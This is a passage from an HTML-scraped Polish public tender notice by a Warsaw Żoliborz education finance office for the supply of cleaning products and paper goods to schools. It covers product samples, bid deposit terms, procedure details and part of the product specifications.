zamówienia:(1) oświadczenie Wykonawcy, że zaoferowane przez niego artykuły posiadają dopuszczenie do obrotu na terytorium Rzeczypospolitej Polskiej, według wzoru określonego w załączniku nr 6 do SIWZ;(2) karty charakterystyki preparatów – dotyczy produktów wskazanych w pozycji numer: 1; 2; 3; 4; 7 8; 9; 11; 12; 13; 14; 15; 16; 17; 18; 21; 22; 23; 24; 25; 27; 28; 29; 30; 31 oraz 32 załącznika nr 1b do SIWZ;</span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione">1. Od wykonawcy powołującego się przy wykazywaniu spełniania warunków udziału w postępowaniu, o których mowa w rozdziale V. 1.2) lit. a) niniejszej SIWZ, na zasoby innych podmiotów - pisemne (oryginał lub kopia poświadczona za zgodność z oryginałem przez notariusza) zobowiązanie tych podmiotów do oddania do dyspozycji niezbędnych zasobów na potrzeby wykonywania zamówienia, zawierające informacje dotyczące co najmniej: a) zakresu dostępnych wykonawcy zasobów innego podmiotu; b) sposobu wykorzystania zasobów innego podmiotu, przez wykonawcę, przy wykonywaniu zamówienia publicznego; c) zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia publicznego. 2. Oferta musi zawierać próbki oferowanych produktów:a) mleczko do czyszczenia wymienione w poz. nr 18 załącznika nr 1b do SIWZ (1 opakowanie = 500 ml) – próbka ma umożliwić dokonanie oceny oferty w Części nr 1 „Środki czystości i artykuły do sprzątania” w kryterium nr 3 „parametry techniczne”, opisanym w rozdziale XIII punkt 2 niniejszej SIWZ;b) mydło do rąk w płynie wymienione w poz. nr 4 załącznika nr 1b do SIWZ (1 opakowanie = 5 l) – próbka ma umożliwić dokonanie oceny oferty w Części nr 1 „Środki czystości i artykuły do sprzątania” w kryterium nr 3 „parametry techniczne”, opisanym w rozdziale XIII punkt 2 niniejszej SIWZ;c) mydło sodowe toaletowe w kostce wymienione w poz. nr 5 załącznika nr 1b do SIWZ (1 sztuka = 100 g) – próbka ma umożliwić dokonanie oceny oferty w Części nr 1 „Środki czystości i artykuły do sprzątania” w kryterium nr 3 „parametry techniczne”, opisanym w rozdziale XIII punkt 2 niniejszej SIWZ;d) płyn do ręcznego mycia naczyń w postaci silnego koncentratu wymieniony w poz. nr 1 załącznika nr 1b do SIWZ (1 opakowanie = 5 l) – próbka ma umożliwić dokonanie oceny oferty w Części nr 1 „Środki czystości i artykuły do sprzątania” w kryterium nr 3 „parametry techniczne”, opisanym w rozdziale XIII punkt 2 niniejszej SIWZ;e) papier toaletowy, mała rolka - wymieniony w poz. nr 1 załącznika nr 1c do SIWZ (1 sztuka = dł. wstęgi min. 36Mb) – próbka ma umożliwić dokonanie oceny oferty w Części nr 2 „Papier toaletowy i ręczniki papierowe” w kryterium nr 3 „parametry techniczne”, opisanym w rozdziale XIII punkt 2 niniejszej SIWZ;f) papier toaletowy, duża rolka - wymieniony w poz. nr 2 załącznika nr 1c do SIWZ (1 sztuka = dł. wstęgi min. 100Mb) – próbka ma umożliwić dokonanie oceny oferty w Części nr 2 „Papier toaletowy i ręczniki papierowe” w kryterium nr 3 „parametry techniczne”, opisanym w rozdziale XIII punkt 2 niniejszej SIWZ;g) ręczniki papierowe składane typu ZZ wymienione w poz. nr 4 załącznika nr 1c do SIWZ (1 opakowanie = nie mniej niż 200 listków) – próbka ma umożliwić dokonanie oceny oferty w Części nr 2 „Papier toaletowy i ręczniki papierowe” w kryterium nr 3 „parametry techniczne”, opisanym w rozdziale XIII punkt 2 niniejszej SIWZ.3. Próbki powinny znajdować się w oddzielnym opakowaniu niż oferta. 4. Paczka z próbkami powinna być oznaczona w następujący sposób: „Próbki do przetargu nieograniczonego na dostawę artykułów i środków czystości na potrzeby placówek oświatowych Dzielnicy Żoliborz m.st. Warszawy”5. Próbki powinny zawierać informacje, których pozycji formularza cenowego dotyczą.6. Próbki należy złożyć w pokoju nr 17 Dzielnicowego Biura Finansów Oświaty Żoliborz m. st. Warszawy przy ul. Felińskiego 15 (wejście od ul. Bitwy pod Rokitną) do dnia 18.02.2020 r. do godz. 09.00. Wewnątrz należy umieścić informacje o nazwie i adresie Wykonawcy. 7. Próbki - ze względu na konieczność ich wykorzystania przy testach - nie podlegają zwrotowi. 8. Dostarczone próbki powinny być tożsame z środkami czystości, które zostaną dostarczone do zamawiającego po podpisaniu umowy.9. Dostarczone próbki stanowią element oferty i służą do jej oceny, w związku z tym nie podlegają uzupełnieniu w trybie art. 26 ust. 3 ustawy Pzp. Próbki muszą być identyczne, jak oferowane produkty. </span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Przetarg nieograniczony</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Tak</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium">1. Zamawiający wymaga wniesienia wadium w wysokości 5.000,- zł (słownie: pięć tysięcy złotych), przez każdego wykonawcę ubiegającego się o udzielenie zamówienia samodzielnie albo łącznie przez wszystkich wykonawców ubiegających się o udzielenie zamówienia wspólnie.2. Wadium może być wniesione w: w pieniądzu, w poręczeniach bankowych, w poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej o charakterze pieniężnym, w gwarancjach bankowych, w gwarancjach ubezpieczeniowych lub w poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. 2016 poz. 359 z późn. zm.).3. Wadium wnoszone w formie pieniężnej należy wpłacić przelewem na rachunek bankowy Zamawiającego o numerze: 63 1030 1508 0000 0005 5036 4034, z dopiskiem na przelewie: „Wadium w postępowaniu nr DBFO.EJ.2411.3.2020 na dostawę artykułów i środków czystości na potrzeby placówek oświatowych Dzielnicy Żoliborz m. st. Warszawy”. 4. Wadium wnoszone w formie innej niż pieniężna należy złożyć w oryginale w siedzibie zamawiającego przy ul. Felińskiego 15 w Warszawie, w sekretariacie, jednocześnie z ofertą, jednakże bez łączenia w sposób trwały z pozostałymi stronami oferty albo w odrębnej przesyłce. 5. Zamawiający zaleca, aby w przypadku wniesienia wadium w formie pieniężnej – dokument potwierdzający dokonanie przelewu wadium został dołączony do oferty; a w przypadku wniesienia wadium w formie innej niż pieniądz – oryginał dokumentu został złożony w oddzielnej kopercie, a jego kopia w ofercie.6. Wadium wnoszone w formie innej niż pieniężna zostanie uznane przez zamawiającego za prawidłowo wniesione, w przypadku, gdy z oryginału dokumentu będą wynikać co najmniej następujące informacje:(1) wystawca dokumentu będzie zobowiązany wypłacić kwotę wadium w przypadku zaistnienia co najmniej jednej okoliczności określonej w art. 46 ust. 4a i ust. 5 pkt 1-3 ustawy z dnia 29.01.2004 r. – Prawo zamówień publicznych;(2) wystawca dokumentu będzie zobowiązany wypłacić kwotę wadium nie później niż w terminie do 30 dni od otrzymania pierwszego pisemnego żądania zamawiającego, informującego o zaistnieniu co najmniej jednej okoliczności określonej w art. 46 ust. 4a i ust. 5 pkt 1-3 ustawy z dnia 29.01.2004 r. – Prawo zamówień publicznych;(3) beneficjentem kwoty wadium będzie Dzielnicowe Biuro Finansów Oświaty Żoliborz m. st. Warszawy ul. Felińskiego 15, 01-513 Warszawa;4) zobowiązanie wystawcy dokumentu do wypłaty kwoty wadium będzie miało charakter bezwarunkowy i nieodwołalny;5) zobowiązanie wystawcy dokumentu do wypłaty kwoty wadium będzie obejmować co najmniej okres związania ofertą.7. Wadium należy wnieść w terminie do dnia 18.02.2020 r. do godz. 09:00., przy czym za termin wniesienia wadium w formie pieniężnej uznaje się moment wpływu kwoty wadium na rachunek bankowy zamawiającego, natomiast za termin wniesienia wadium w innej formie niż pieniężna uznaje się moment wpływu oryginału dokumentu do sekretariatu w siedzibie zamawiającego. 8. Oferta Wykonawcy, który nie wniesie wadium lub wniesie wadium w sposób nieprawidłowy zostanie odrzucona.</span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej">Nie</span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej">Nie</span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej">Nie</span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow"></span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie"></span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow"></span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow"></span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna">Nie</span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci"></span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani"></span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp">Nie</span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie"></span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial"></span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu"></span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6"></span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7"></span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8"></span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9"></span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa"></span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"> Czas trwania: </span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani"></span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data"></span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"></span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12"></span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13"></span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia"></span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14"></span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Tak</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst">Zamawiający dopuszcza dokonywanie zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy:(1) w przypadku konieczności zmniejszenia ilości artykułów i środków czystości w stosunku do ilości określonej w formularzach cenowych, stanowiących załącznik nr 1b i 1c do SIWZ oraz w ofercie Wykonawcy;(2) w przypadku zmiany ilości placówek oświatowych Dzielnicy Żoliborz m. st. Warszawy w stosunku do ilości wyszczególnionych w załączniku nr 1 do umowy;(3) w przypadku zmiany okresów dostaw częściowych w stosunku do okresów wyszczególnionych w załączniku nr 7 do SIWZ.</span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania"></span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data">2020-02-18</span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina">09:00</span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu">Nie</span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki">polski</span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres">30</span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków, które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17">Nie</span> <br/> <b>IV.6.5) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> <table><tr><td><b>Część nr: </b></td><td>1</td><td><b>Nazwa: </b></td><td>Środki czystości i artykuły do sprzątania</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1	Płyn do ręcznego mycia naczyń w postaci silnego koncentratu, usuwający zanieczyszczenia organiczne i tłuszcze, wartość PH roztworu neutralna, delikatny dla skóry rąk, gęsty ale nie galaretowaty, spieniający, wysoce wydajny (2,5 ml na 5 l wody ), bardzo dobrze usuwający tłuste zabrudzenia, czyszczący wszystkie powierzchnie i naczynia zarówno w ciepłej jak i zimnej wodzie, nadający połysk, nie pozostawiający smug. Skład 5-15% anionowe środki powierzchniowo czynne, < 5 % niejonowe środki powierzchniowo czynne, kompozycje zapachowe - kwiatowe i cytrusowe. Gęstość względna min. 1,00 g/cm3. Przetestowany dermatologicznie. (1 opakowanie = 5 l) opakowanie	8642	"Proszek do prania tkanin białych, do prania ręcznego i w pralkach automatycznych, zapewniający ochronę włókien, zapobiegający mechaceniu się, chroniący przed zafarbowaniem podczas prania,nadający praniu świeży i długotrwały zapach, spierający plamy wszelkiego rodzaju, zapobiegający podrażnieniom skóry, łatwo rozpuszczający się w wodzie, nie pozostawiający na ubraniach smug i osadu, posiadający aktywne składniki działające już w niskich temperaturach wody. Usuwa plamy w zakresie temperatur 30-90 st. C. Wystarczający na około 40 prań. Skład: 10 -30% - związki wybielające na bazie tlenu, 5-15% anionowe środki powierzchniowo czynne, < 5% - niejonowe środki powierzchniowo czynne, enzymy, rozjaśniacze optyczne. Opakowanie proszku charakteryzujące się wytrzymałością, z uchwytem.(1 opakowanie = minimum 4 kg)"	opakowanie	1653	"Proszek do prania do tkanin kolorowych z właściwościami chroniącymi kolory i bawełnę, do prania ręcznego i w pralkach automatycznych, zapewniający ochronę włókien, zapobiegający mechaceniu się, chroniący przed zafarbowaniem podczas prania, nadający praniu świeży i długotrwały zapach, spierający uporczywe plamy, nie podrażniający skóry, łatwo ropuszczający się w wodzie, nie pozostawiająych na ubraniach smug i osadu, posiadający aktywne składniki działające już w niskich temperaturach wody. Usuwa plamy w zakresie temperatur 30-90 st. C. Wystarczający na około 40 prań. Skład: 5-15 % anionowe środki powierzchniowo czynne, < 5% - niejonowe środki powierzchniowo czynne, enzymy. Opakowanie proszku charakteryzujące się wytrzymałością, z uchwytem. (1 opakowanie = minimum 4 kg)"	opakowanie	1754	"Mydło do rąk w płynie o działaniu antybakteryjnym, glicerynowe o bardzo gęstej konsystencji. Mydło posiadające dobre właściwości myjące, pielęgnujące i nawilżające, dobrze pieniące się, do codziennego mycia rąk, nie wysuszające skóry, przeznaczone do skóry wrażliwej, pozostawiające na skórze miły, delikatny zapach. Mydło musi posiadać pozytywną opinię dermatologiczną. Mydło nie może samoczynnie wyciekać z dozowników. (1 opakowanie = 5 l)"	opakowanie	7265	"Mydło sodowe toaletowe w kostce, myjące, zawierające substance nawilżające skórę, glicerynę i kompozycje zapachowe, delikatne dla skóry rąk, (1 sztuka = 100 g)"	sztuka	2136	"Płyn do mycia szyb ze spryskiwaczem, z alkoholem, 2 funkcyjna pompka umożliwiająca dozowanie produktu w formie pianki lub ciekłej, do mycia luster i innych szklanych powierzchni, usuwający kurz, tłuszcz i brud, zabezpieczający powierzchnie przed szybkim zabrudzeniem, nie pozostawiający smug i zacieków(1 opakowanie = 500 ml)"	opakowanie	1 4777	"Uniwersalny środek myjący do silnie zabrudzonych powierzchni, nie zawierający amoniaku, posiadający świeży, długo utrzymujący się zapach. Preparat przeznaczony do wszystkich zmywalnych powierzchni takich jak: posadzki, drzwi, framugi, płytki, schody, szafki, itp. Produkt może być stosowany nierozcieńczony, ale wówczas należy spłukać mytą powierzchnię wodą. Zawierający: anionowe środki powierachniowo-czynne<5%, niejonowe środki powierzchniowo-czynny <5% oraz kompozycje zapachowe.ph: od 5 do 6,5 Gęstość min. 1000 g/cm3(1 opakowanie = 5 l)"	opakowanie	8048	Płyn do mycia i konserwacji paneli podłogowych oraz wszelkich powierzchni drewnianych, również nielakierowanych (podłóg, boazerii, szaf, listew), skutecznie czyszczący różnego rodzaju zabrudzenia, nie pozostawiający smug, nie nawarstwiający się, nie wymagający stosowania specjalnych zmywaczy, posiadający przyjemny i trwały zapach, antystatyczny, pozostawiający delikatną warstwę ochronną. Zawiera w składzie oksyetylenowane alkohole; PH od 7 do 9. (1 opakowanie = 1 l)	opakowanie	7949	"Gęsty płyn do WC, bakteriobójczy, usuwający zabrudzenia, osad z kamienia i rdzę. Nie przebarwiający, nie zarysowujący mytych powierzchni. Skład: 3-5 % podchloryn sodu, kompozycje zapachowe, nie drażniący dróg oddechowych, ph od 11 do 14. (1 opakowanie = 750 ml)"	opakowanie	1 75210	Kostka WC do muszli klozetowej na bazie substancji powierzchniowo-czynnych- zawieszka, trójfazowa, antybakteryjna, odświeżająca o zapachu leśnym, morskim, cytrynowym lub kwiatowym, zapobiegająca osiadaniu się kamienia, o długotrwałym działaniu (waga kostki 40g - 60g)	sztuka	1 30111	Gęsty płyn do dezynfekcji toalet, na bazie chloru, do powierzchni typu terakota, lastrico, glazura, czyszczący i wybielający (zawierający podchloryn sodu) oraz zwalczający wszelkie szkodliwe dla zdrowia drobnoustroje. Do stosowania w miejscach, gdzie gromadzą się niewidoczne dla oka mikroorganizmy. Preparat powinien mieć zastosowanie w łazience, w toalecie oraz w okolicach otworów kanalizacyjnych, śmietników ( bez rozcieńczenia ) oraz w rozcieńczeniu - do podłóg i płytek ceramicznych. Zapobiegający powstawaniu osadów i zanieczyszczeń, usuwający nieprzyjemny zapach, nie drażniący dróg oddechowych. Gęstość min. 1000 g/cm3. Skład: 1-5 % podchloryn sodu , 1-5 % wodorotlenek sodu , < 1 %; niejonowe środki powierzchniowo czynne; ph od 11 do 14. (1 opakowanie = 750 ml)	opakowanie	1 85912	Płyn do usuwania kamienia i rdzy w sprayu (z atomizerem) przeznaczony do czyszczenia kuchni i łazienki. Czyści: zlewy, wanny, baterie ze stali nierdzewnej, odpływy, toalety, prysznice, kafelki, ceramiczne podłogi, powierzchnie akrylowe, szklane powierzchnie. Usuwa brud, osady z kamienia i mydła oraz rdzę. Nadaje połysk i pozostawia warstwę 